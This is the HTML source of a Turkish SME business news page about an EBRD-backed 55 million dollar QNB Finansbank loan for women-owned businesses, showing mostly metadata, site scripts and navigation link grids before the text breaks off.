﻿<!DOCTYPE html>
<html lang="tr">
  <head>
        <title>EBRD, kadınlar için 55 milyon ABD doları kredi sağladı</title>
    <meta charset="utf-8">
    <!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
    <meta name="description" content="QNB Finansbank European Bank for Reconstruction and Development&#039;ın (EBRD-Avrupa İmar ve Kalkınma Bankası) kadın girişimcilere destek programı Women">
    <meta name="keywords" content="EBRD, QNB Finansbank, Jean Patrick Marquet">
    <meta property="fb:admins" content="">
        <meta property="og:site_name" content="EBRD, kadınlar için 55 milyon ABD doları kredi sağladı">
    <meta property="og:title" content="EBRD, kadınlar için 55 milyon ABD doları kredi sağladı">
    <meta property="og:description" content="QNB Finansbank European Bank for Reconstruction and Development&#039;ın (EBRD-Avrupa İmar ve Kalkınma Bankası) kadın girişimcilere destek programı Women"> 
    <meta property="og:url" content="http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html">
    <meta property="og:image" content="http://www.kobi-efor.com.tr/images/haberler/ebrd_kadinlar_icin_55_milyon_abd_dolari_kredi_sagladi_h6788_a6c4a.jpg">    <meta property="og:type" content="article">
        <meta http-equiv="refresh" content="600">    <meta name="twitter:card" content="summary_large_image">        <meta name="twitter:url" content="http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html">
    <meta name="twitter:domain" content="http://www.kobi-efor.com.tr/">
    <meta name="twitter:site" content="">
    <meta name="twitter:title" content="EBRD, kadınlar için 55 milyon ABD doları kredi sağladı">    <meta name="twitter:description" content="QNB Finansbank, European Bank for Reconstruction and Development’ın (EBRD-Avrupa İmar ve Kalkınma Bankası) kadın girişimcilere destek programı Women in Business kapsamında, kadınların sahibi veya yöneticisi olduğu işletmelere kullandırmak üzere 55 milyon dolar kredi sağladı.">
    <meta name="twitter:image:src" content="http://www.kobi-efor.com.tr/images/haberler/ebrd_kadinlar_icin_55_milyon_abd_dolari_kredi_sagladi_h6788_a6c4a.jpg">        <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/base.min.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/icons.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/style.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/hs.css" rel="stylesheet">
   
        <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/print.css" rel="stylesheet" media="print, handheld">    <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.kobi-efor.com.tr/rss.php" />
    <link rel="shortcut icon" href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/favicon.ico">
    <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&subset=latin,latin-ext" rel="stylesheet" type="text/css">
    <link rel="canonical" href="http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html">

     

    <!--[if gte IE 9]>
    <style type="text/css">
        .gradient {
            filter: none;
        }
    </style>
    <![endif]-->
    <!--[if IE 7]>
    <style type="text/css">
        .reklam.dikey.sol .fixed {
            margin-left:-160px;
        }
    </style>
    <![endif]-->

    <script type="text/javascript">
    var site_url   = 'http://www.kobi-efor.com.tr/';
    var tema       = 'hs-vertigo';
    var theme_path = 'http://www.kobi-efor.com.tr/_themes/hs-vertigo/';
    var ajax_url   = '_ajax/';
    var cat_limit  = '10';
    var poll_voted = '';    var comment_approved = '0';
    var doviz    = '1';
    var lazyload = '1';
    var twitter_user  = '';
    var facebook_user = 'KobiEfor';
    var popup_saat = '1';
    var arkaplan_link = '';    var hava   = '1';
    var hava_default   = 'TUXX0014';
    var namaz   = '1';
    var namaz_default   = 'istanbul';
    var superlig   = '0';

        </script>

        <!-- GOOGLE ANALITIK -->
    <script type="text/javascript">
    	var _gaq = _gaq || [];
    	_gaq.push(['_setAccount', 'UA-26224214-1']);
    	_gaq.push(['_trackPageview']);
    </script>
    <!-- GOOGLE ANALITIK -->
    

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body >



      <div class="container center shadow">
        <div class="header">
          <div id="ustkisim" class="row">
          ﻿<!-- UST REKLAM-MENU -->
        <div id="reklammenu" class="span12">
                    <div class="row-fluid">
            <div class="span12">
              <div class="ustmenu">
                <a href="http://www.kobi-efor.com.tr/m/" title="Mobil"><i class="halflings-icon phone"></i> Mobil</a>
                <a href="http://www.kobi-efor.com.tr/kunye.html" title="Künye"><i class="halflings-icon link"></i> Künye</a>
                <a href="http://www.kobi-efor.com.tr/sitene-ekle.html"><i class="halflings-icon plus-sign"></i> Sitene Ekle</a>
                <a href="http://www.kobi-efor.com.tr/iletisim.html" title="İletişim" class="last"><i class="halflings-icon envelope"></i> İletişim</a>

                <div id="memberArea" class="pull-right"></div>
              
              </div>
            </div>
          </div>
        </div>
<!-- UST REKLAM-MENU ***************************************************** -->
<!-- LOGO REKLAM ALANI -->
        <div id="logo" class="span12">
          <div class="row-fluid">
            <div class="span3">
              <h1 class="logo"><a href="http://www.kobi-efor.com.tr/" class="logo"><img src="http://www.kobi-efor.com.tr/images/banner/kobiefor_logo_190x87png.png" alt="EBRD, kadınlar için 55 milyon ABD doları kredi sağladı" /></a></h1>
            </div>
            <div class="span9">
            <div class="row-fluid">
            <div class="reklam" style="margin-left: -15px;"><a href="http://www.kobi-efor.com.tr/banner.php?id=203" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/thumb.php?src=http://www.kobi-efor.com.tr/images/banner/altinbas_univ.jpg&w=768&h=90&q=90" width="768" height="90" style="width:768px;height: 90px;border:0" alt="banner203" /></a></div>            </div>
            <div class="row-fluid line">
              <span><i class="halflings-icon time"></i> 05 Eylül 2017 Salı</span>
              <a href="http://facebook.com/KobiEfor" target="_blank" title="Facebook Sayfamız"><i class="social-icon social-fb"></i> Facebook</a>
              <a href="http://twitter.com/" target="_blank" title="Twitter Sayfamız"><i class="social-icon social-tw"></i> Twitter</a>
              <a href="" target="_blank" title="Google Plus Sayfamız"><i class="social-icon social-gl"></i> Google</a>
              <a href="http://www.kobi-efor.com.tr/rss.php" target="_blank" title="RSS Servisi"><i class="social-icon social-rss"></i> RSS</a>
            </div>
            </div>
                      </div>
        </div>
<!-- LOGO REKLAM ALANI ***************************************************** -->
<!-- MENU -->
        <div id="menu" class="span12">
          <div class="row-fluid">
              <div class="anamenu span12">
              <form action="http://www.kobi-efor.com.tr/" method="get" class="pull-right">
                  <input type="hidden" name="m" value="arama">
                  <input type="text" name="q" placeholder="Haber yada kelime ara...">
                  <input type="hidden" name="auth" value="1060948025d4094e5cc74bb8b3fd594078c7619b" />
                  <button class="btn btn-link" type="submit"><i class="halflings-icon white search"></i></button>
              </form>
              <a href="http://www.kobi-efor.com.tr/" class="current darken">&nbsp;<i class="halflings-icon white home"></i>&nbsp;Ana Sayfa</a>
                <a href="http://www.kobi-efor.com.tr/hakkimizda-s4.html"> Hakkımızda</a>
                <a href="http://www.kobi-efor.com.tr/about-us-s5.html"> About Us</a>
                <a href="http://www.kobi-efor.com.tr/galeri/" class="blue"><i class="halflings-icon white picture"></i> Foto Galeri</a>
                <a href="http://www.kobi-efor.com.tr/webtv/" class="yellow"><i class="halflings-icon white film"></i> Web TV</a>
                <a href="http://www.kobi-efor.com.tr/edergi/oku/2017/9/" target="_blank"><i class="halflings-icon white book"></i> E-Dergi</a>
                <a href="http://www.kobi-efor.com.tr/edergi/" target="_blank"><i class="halflings-icon white folder-open"></i> Arşiv</a>
                <!--a href="http://www.kobi-efor.com.tr/biyografiler.html" class=""><i class="halflings-icon white book"></i> Biyografiler</a-->
                

            </div>
          </div>
            <div class="row-fluid sticky-menu">
                              <div class="kategori">
                <a href="http://www.kobi-efor.com.tr/" class="home">&nbsp;<i class="halflings-icon white home"></i>&nbsp;</a>                 
                                  <a title="KAPAK" href="http://www.kobi-efor.com.tr/kapak" id="k1"    >KAPAK</a>
<a title="ETKİNLİK" href="http://www.kobi-efor.com.tr/etkinlik" id="k38"    >ETKİNLİK</a>
<a title="SÖYLEŞİ" href="http://www.kobi-efor.com.tr/soylesi" id="k37"    >SÖYLEŞİ</a>
<a title="OSB" href="http://www.kobi-efor.com.tr/osb" id="k2"    >OSB</a>
<a title="SEKTÖR" href="http://www.kobi-efor.com.tr/sektor" id="k3"    >SEKTÖR</a>
<a title="ÜLKE" href="http://www.kobi-efor.com.tr/ulke" id="k5"    >ÜLKE</a>
<a title="AKADEMİ" href="http://www.kobi-efor.com.tr/akademi" id="k44"    >AKADEMİ</a>
<a title="DESTEK-TEŞVİK" href="http://www.kobi-efor.com.tr/destek-tesvik" id="k45"    >DESTEK-TEŞVİK</a>
<a title="YAŞAM" href="http://www.kobi-efor.com.tr/yasam" id="k47"    >YAŞAM</a>
<a title="HABERLER" href="http://www.kobi-efor.com.tr/haberler" id="k46"    >HABERLER</a>
<div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">Tüm Kategoriler</a></div> 
                                              <form action="http://www.kobi-efor.com.tr/" method="get" class="pull-right">
                  <input type="hidden" name="m" value="arama">
                  <input type="text" name="q" placeholder="Haber yada kelime ara...">
                  <input type="hidden" name="auth" value="1060948025d4094e5cc74bb8b3fd594078c7619b" />
                  <button class="btn btn-link" type="submit"><i class="halflings-icon white search"></i></button>
              </form>
                </div>
                <div class="othercat">
                  <div class="inner">
                    <div class="clearfix">
                    
                    </div>
                  </div>
                </div>
                                          
           
          <div id="katicerik" class="row-fluid"><div class="katelement kat_k1">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/zamanin-ruhu-emrediyor-her-yerde-ve-seyde-dijitallesin-h6801.html" title="Zamanın ruhu emrediyor; Her Yerde ve Şeyde Dijitalleşin!"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/zamanin_ruhu_emrediyor_her_yerde_ve_seyde_dijitallesin_h6801_1f395.jpg" alt="Zamanın ruhu emrediyor; Her Yerde ve Şeyde Dijitalleşin!" />
<b>Zamanın ruhu emrediyor; Her Yerde ve Şeyde Dijitalleşin!</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/nesnelerin-interneti-iot-internet-of-things-h6587.html" title="NESNELERİN İNTERNETİ IoT (Internet of Things)"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/nesnelerin_interneti_iot_internet_of_things_h6587_05824.jpg" alt="NESNELERİN İNTERNETİ IoT (Internet of Things)" />
<b>NESNELERİN İNTERNETİ IoT (Internet of Things)</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/buyume-ve-kalkinmanin-ekosistemi-yasalasti-h6560.html" title="Büyüme ve kalkınmanın ekosistemi yasalaştı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/buyume_ve_kalkinmanin_ekosistemi_yasalasti_h6560_4c555.jpg" alt="Büyüme ve kalkınmanın ekosistemi yasalaştı" />
<b>Büyüme ve kalkınmanın ekosistemi yasalaştı</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/xiii-kobi-zirvesi-mesajini-verdi-kobi-degisir-turkiye-buyur-h6391.html" title="XIII. KOBİ Zirvesi mesajını verdi: KOBİ değişir, Türkiye büyür”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/xiii_kobi_zirvesi_mesajini_verdi_kobi_degisir_turkiye_buyur_h6391_98831.jpg" alt="XIII. KOBİ Zirvesi mesajını verdi: KOBİ değişir, Türkiye büyür”" />
<b>XIII. KOBİ Zirvesi mesajını verdi: “KOBİ değişir, Türkiye büyür”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/20-avrasya-ekonomi-zirvesi-istanbulda-yapildi-h6271.html" title="20. Avrasya Ekonomi Zirvesi, İstanbulda yapıldı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/20_avrasya_ekonomi_zirvesi_istanbul_da_yapildi_h6271_37d3d.jpg" alt="20. Avrasya Ekonomi Zirvesi, İstanbulda yapıldı" />
<b>20. Avrasya Ekonomi Zirvesi, İstanbul’da yapıldı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/20-avrasya-ekonomi-zirvesi-4-6-nisan-2017de-istanbulda-h6195.html" title="20. Avrasya Ekonomi Zirvesi 4-6 Nisan 2017de İstanbulda"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/20_avrasya_ekonomi_zirvesi_4_6_nisan_2017de_istanbulda_h6195_5f739.jpg" alt="20. Avrasya Ekonomi Zirvesi 4-6 Nisan 2017de İstanbulda" />
<b>20. Avrasya Ekonomi Zirvesi 4-6 Nisan 2017’de İstanbul’da</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/tobb-turkiye-ekonomi-surasi-acil-gundem-istihdam-h6123.html" title="TOBB Türkiye Ekonomi Şurası; ACİL GÜNDEM İSTİHDAM"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tobb_turkiye_ekonomi_surasi_acil_gundem_istihdam_h6123_aa9f7.png" alt="TOBB Türkiye Ekonomi Şurası; ACİL GÜNDEM İSTİHDAM" />
<b>TOBB Türkiye Ekonomi Şurası; ACİL GÜNDEM İSTİHDAM</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/2017de-ekonomik-yukselise-yeni-bir-kaldirac-gumruk-birligi-reformu-h6006.html" title="2017de ekonomik yükselişe yeni bir ‘kaldıraç; GÜMRÜK BİRLİĞİ REFORMU"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/2017de_ekonomik_yukselise_yeni_bir_kaldirac_gumruk_birligi_reformu_h6006_e0389.png" alt="2017de ekonomik yükselişe yeni bir ‘kaldıraç; GÜMRÜK BİRLİĞİ REFORMU" />
<b>2017’de ekonomik yükselişe yeni bir ‘kaldıraç’; GÜMRÜK BİRLİĞİ REFORMU</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/2017-yili-ekonomik-buyume-stratejisi-uretime-yatirim-h5922.html" title="2017 Yılı Ekonomik Büyüme Stratejisi: ÜRETİME YATIRIM"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/2017_yili_ekonomik_buyume_stratejisi_uretime_yatirim_h5922_5c490.png" alt="2017 Yılı Ekonomik Büyüme Stratejisi: ÜRETİME YATIRIM" />
<b>2017 Yılı Ekonomik Büyüme Stratejisi: ÜRETİME YATIRIM</b></a>
</div>
</div></div><div class="katelement kat_k38">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/forum-istanbul-2023-h6401.html" title="Forum İstanbul 2023"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/forum_istanbul_2023_h6401_fa8c5.jpg" alt="Forum İstanbul 2023" />
<b>Forum İstanbul 2023</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/hatay-kobilerine-finansal-enformasyon-h5844.html" title="Hatay KOBİlerine finansal enformasyon"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/hatay_kobi_lerine_finansal_enformasyon_h5844_7a0b2.png" alt="Hatay KOBİlerine finansal enformasyon" />
<b>Hatay KOBİ’lerine finansal enformasyon</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/finans-kulup-gencler-ve-kobilerle-bulusuyor-h5150.html" title="Finans Kulüp gençler ve KOBİlerle buluşuyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/finans_kulup_gencler_ve_kobilerle_bulusuyor_h5150_04101.png" alt="Finans Kulüp gençler ve KOBİlerle buluşuyor" />
<b>Finans Kulüp gençler ve KOBİ’lerle buluşuyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/turkiye-inovasyon-haftasi-3-gunde-50-bin-kisiyi-bulusturdu-h4840.html" title="‘Türkiye İnovasyon Haftası 3 günde 50 bin kişiyi buluşturdu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_inovasyon_haftasi_3_gunde_50_bin_kisiyi_bulusturdu_h4840_08d3d.png" alt="‘Türkiye İnovasyon Haftası 3 günde 50 bin kişiyi buluşturdu" />
<b>‘Türkiye İnovasyon Haftası’ 3 günde 50 bin kişiyi buluşturdu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/tbd-32-ulusal-bilisim-kurultayi-ve-2-ankara-bilisim-fuari-h4847.html" title="TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tbd_32_ulusal_bilisim_kurultayi_ve_2_ankara_bilisim_fuari_bilisim_2015citex_2015_h4847_125e6.png" alt="TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı" />
<b>TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/tosyov-samsunlu-kadin-girisimcileri-egitti-bilincli-kadin-girisimciler-artacak-h4844.html" title="TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak."><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tosyov_samsunlu_kadin_girisimcileri_egitti_bilincli_kadin_girisimciler_artacak_h4844_b22e9.png" alt="TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak." />
<b>TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak.</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/4-kobi-ve-girisimcilik-odulleri-h4854.html" title="4. KOBİ ve Girişimcilik Ödülleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/4_kobi_ve_girisimcilik_odulleri_h4854_5b8a5.png" alt="4. KOBİ ve Girişimcilik Ödülleri" />
<b>4. KOBİ ve Girişimcilik Ödülleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/6-bogazici-zirvesi-80-ulkenin-siyasilerini-bulusturdu-daha-az-yoksulluk-daha-fazla-refah-h4856.html" title="6. Boğaziçi Zirvesi, 80 ülkenin siyasilerini buluşturdu. Daha az yoksulluk, daha fazla refah”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/6_bogazici_zirvesi_80_ulkenin_siyasilerini_bulusturdu_daha_az_yoksulluk_daha_fazla_refah_h4856_254da.png" alt="6. Boğaziçi Zirvesi, 80 ülkenin siyasilerini buluşturdu. Daha az yoksulluk, daha fazla refah”" />
<b>6. Boğaziçi Zirvesi, 80 ülkenin siyasilerini buluşturdu. “Daha az yoksulluk, daha fazla refah”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/toplam-95-milyar-dolar-ihracat-yaptilar-metal-sektorun-ihracat-yildizlari-odullerini-aldi-h4859.html" title="Toplam 9.5 milyar dolar ihracat yaptılar. Metal sektörün ihracat yıldızları, ödüllerini aldı."><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/toplam_95_milyar_dolar_ihracat_yaptilar_metal_sektorun_ihracat_yildizlari_odullerini_aldi_h4859_0cd96.png" alt="Toplam 9.5 milyar dolar ihracat yaptılar. Metal sektörün ihracat yıldızları, ödüllerini aldı." />
<b>Toplam 9.5 milyar dolar ihracat yaptılar. Metal sektörün ihracat yıldızları, ödüllerini aldı.</b></a>
</div>
</div></div><div class="katelement kat_k37">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ceo/donmez-debriyaj-yonetim-kurulu-baskani-hasan-donmez-is-sirrini-acikliyorisini-severek-yap-h6711.html" title="Dönmez Debriyaj Yönetim Kurulu Başkanı Hasan Dönmez, iş sırrını açıklıyor:İşini severek yap”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/donmez_debriyaj_yonetim_kurulu_baskani_hasan_donmez_is_sirrini_acikliyorisini_severek_yap_h6711_63904.jpg" alt="Dönmez Debriyaj Yönetim Kurulu Başkanı Hasan Dönmez, iş sırrını açıklıyor:İşini severek yap”" />
<b>Dönmez Debriyaj Yönetim Kurulu Başkanı Hasan Dönmez, iş sırrını açıklıyor:“İşini severek yap”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ekonomist/profdr-erinc-yeldan-uretkenlik-yavasliyor-h6714.html" title="Prof.Dr. Erinç Yeldan: Üretkenlik yavaşlıyor”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/profdr_erinc_yeldan_uretkenlik_yavasliyor_h6714_4ced4.jpg" alt="Prof.Dr. Erinç Yeldan: Üretkenlik yavaşlıyor”" />
<b>Prof.Dr. Erinç Yeldan: “Üretkenlik yavaşlıyor”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ajans/onumuzdeki-3-yilda-turkiyedeki-ilk-5-dijital-ajans-arasina-girmeyi-hedefliyor-diverseffect-h6715.html" title="Önümüzdeki 3 yılda Türkiyedeki ilk 5 dijital ajans arasına girmeyi hedefliyor: Diverseffect"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/onumuzdeki_3_yilda_turkiyedeki_ilk_5_dijital_ajans_arasina_girmeyi_hedefliyor_diverseffect_h6715_12bdd.jpg" alt="Önümüzdeki 3 yılda Türkiyedeki ilk 5 dijital ajans arasına girmeyi hedefliyor: Diverseffect" />
<b>Önümüzdeki 3 yılda Türkiye’deki ilk 5 dijital ajans arasına girmeyi hedefliyor: Diverseffect</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ceo/kararli-ol-hizli-ve-dogru-karar-ver-ve-kararindan-donme-h6585.html" title="Kararlı ol, hızlı ve doğru karar ver ve kararından dönme”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kararli_ol_hizli_ve_dogru_karar_ver_ve_kararindan_donme_h6585_4e918.jpg" alt="Kararlı ol, hızlı ve doğru karar ver ve kararından dönme”" />
<b>“Kararlı ol, hızlı ve doğru karar ver ve kararından dönme”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/finans/ing-kobiyi-sevdi-agresif-buyumeye-devam-edecek-h6596.html" title="ING, KOBİyi sevdi agresif büyümeye devam edecek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ing_kobiyi_sevdi_agresif_buyumeye_devam_edecek_h6596_e3aae.jpg" alt="ING, KOBİyi sevdi agresif büyümeye devam edecek" />
<b>ING, KOBİ’yi sevdi agresif büyümeye devam edecek</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/finans/sektor-lideri-yapi-kredi-leasingin-buyume-stratejisi-danisman-kimligiyle-cozum-sunuyor-h6521.html" title="Sektör lideri Yapı Kredi Leasingin büyüme stratejisi: Danışman kimliğiyle ‘ÇÖZÜM sunuyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sektor_lideri_yapi_kredi_leasingin_buyume_stratejisi_danisman_kimligiyle_cozum_sunuyor_h6521_968ba.jpg" alt="Sektör lideri Yapı Kredi Leasingin büyüme stratejisi: Danışman kimliğiyle ‘ÇÖZÜM sunuyor" />
<b>Sektör lideri Yapı Kredi Leasing’in büyüme stratejisi: Danışman kimliğiyle ‘ÇÖZÜM’ sunuyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ajans/yerelden-globale-uzanan-basari-oykusu-arena-media-h6522.html" title="Yerelden globale uzanan başarı öyküsü; Arena Media"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yerelden_globale_uzanan_basari_oykusu_arena_media_h6522_3a389.jpg" alt="Yerelden globale uzanan başarı öyküsü; Arena Media" />
<b>Yerelden globale uzanan başarı öyküsü; Arena Media</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ekonomist/ekonomi-buyumek-icin-ozgurluk-istiyor-katilim-olursa-refah-olur-h6523.html" title="Ekonomi büyümek için özgürlük istiyor Katılım olursa refah olur"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ekonomi_buyumek_icin_ozgurluk_istiyor_katilim_olursa_refah_olur_h6523_961bf.jpg" alt="Ekonomi büyümek için özgürlük istiyor Katılım olursa refah olur" />
<b>Ekonomi büyümek için özgürlük istiyor Katılım olursa refah olur</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/finans/dijital-donusume-odaklanan-teb-musteriye-kisisellestirilmis-hizmet-verecek-h6405.html" title="Dijital dönüşüme odaklanan TEB: Müşteriye kişiselleştirilmiş hizmet verecek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dijital_donusume_odaklanan_tebmusteriye_kisisellestirilmis_hizmet_verecek_h6405_f1f68.jpg" alt="Dijital dönüşüme odaklanan TEB: Müşteriye kişiselleştirilmiş hizmet verecek" />
<b>Dijital dönüşüme odaklanan TEB: Müşteriye kişiselleştirilmiş hizmet verecek</b></a>
</div>
</div></div><div class="katelement kat_k2">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-tanitim/yeni-nesil-yesil-osb-bagyurdu-osb-bayosb-h6803.html" title="Yeni nesil ‘yeşil OSB; Bağyurdu OSB (BAYOSB)"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yeni_nesil_yesil_osb_bagyurdu_osb_bayosb_h6803_61440.jpg" alt="Yeni nesil ‘yeşil OSB; Bağyurdu OSB (BAYOSB)" />
<b>Yeni nesil ‘yeşil’ OSB; Bağyurdu OSB (BAYOSB)</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/adana-osb-icinde-sanayi-kent-kurulacak-h6719.html" title="Adana OSB içinde quot;Sanayi Kentquot; kurulacak"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/adana_osb_icinde_sanayi_kent_kurulacak_h6719_24819.jpg" alt="Adana OSB içinde quot;Sanayi Kentquot; kurulacak" />
<b>Adana OSB içinde &quot;Sanayi Kent&quot; kurulacak</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/tarsus-tarimsal-urun-isleme-ihtisas-osb-kuruluyor-h6721.html" title="Tarsus Tarımsal Ürün İşleme İhtisas OSB kuruluyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tarsus_tarimsal_urun_isleme_ihtisas_osb_kuruluyor_h6721_a967e.jpg" alt="Tarsus Tarımsal Ürün İşleme İhtisas OSB kuruluyor" />
<b>Tarsus Tarımsal Ürün İşleme İhtisas OSB kuruluyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/bursa-teknosab-a-yurtdisindan-ilgi-h6718.html" title="Bursa Teknosab#039;a yurtdışından İlgi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bursa_teknosab_a_yurtdisindan_ilgi_h6718_8f866.jpg" alt="Bursa Teknosab#039;a yurtdışından İlgi" />
<b>Bursa Teknosab&#039;a yurtdışından İlgi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/diyarbakira-sanayi-meyveleri-h6717.html" title="Diyarbakıra ‘sanayi meyveleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/diyarbakira_sanayi_meyveleri_h6717_45cc0.jpg" alt="Diyarbakıra ‘sanayi meyveleri" />
<b>Diyarbakır’a ‘sanayi meyveleri’</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/denizli-makine-osb-hazirliklari-h6720.html" title="Denizli Makine OSB hazırlıkları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/denizli_makine_osb_hazirliklari_h6720_2cf75.jpg" alt="Denizli Makine OSB hazırlıkları" />
<b>Denizli Makine OSB hazırlıkları</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/trabzon-mega-endustri-bolgesi-projesi-hayata-geciyor-h6713.html" title="Trabzon Mega Endüstri Bölgesi Projesi hayata geçiyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/trabzon_mega_endustri_bolgesi_projesi_hayata_geciyor_h6713_10f9b.jpg" alt="Trabzon Mega Endüstri Bölgesi Projesi hayata geçiyor" />
<b>Trabzon Mega Endüstri Bölgesi Projesi hayata geçiyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-tanitim/yenilikci-yerli-ve-yesil-uretime-odaklanan-yeni-nesil-osb-yalova-imes-osb-h6586.html" title="Yenilikçi, yerli ve yeşil üretime odaklanan yeni nesil OSB; Yalova-İMES OSB"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yenilikci_yerli_ve_yesil_uretime_odaklanan_yeni_nesil_osb_yalova_imes_osb_h6586_5d124.jpg" alt="Yenilikçi, yerli ve yeşil üretime odaklanan yeni nesil OSB; Yalova-İMES OSB" />
<b>Yenilikçi, yerli ve yeşil üretime odaklanan yeni nesil OSB; Yalova-İMES OSB</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/kulucka-mantikli-orta-olcek-osbler-geliyor-h6623.html" title="Kuluçka Mantıklı Orta Ölçek OSBler geliyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kulucka_mantikli_orta_olcek_osbler_geliyor_h6623_a58d1.jpg" alt="Kuluçka Mantıklı Orta Ölçek OSBler geliyor" />
<b>Kuluçka Mantıklı Orta Ölçek OSB’ler geliyor</b></a>
</div>
</div></div><div class="katelement kat_k3">
<div class="span4"><div>
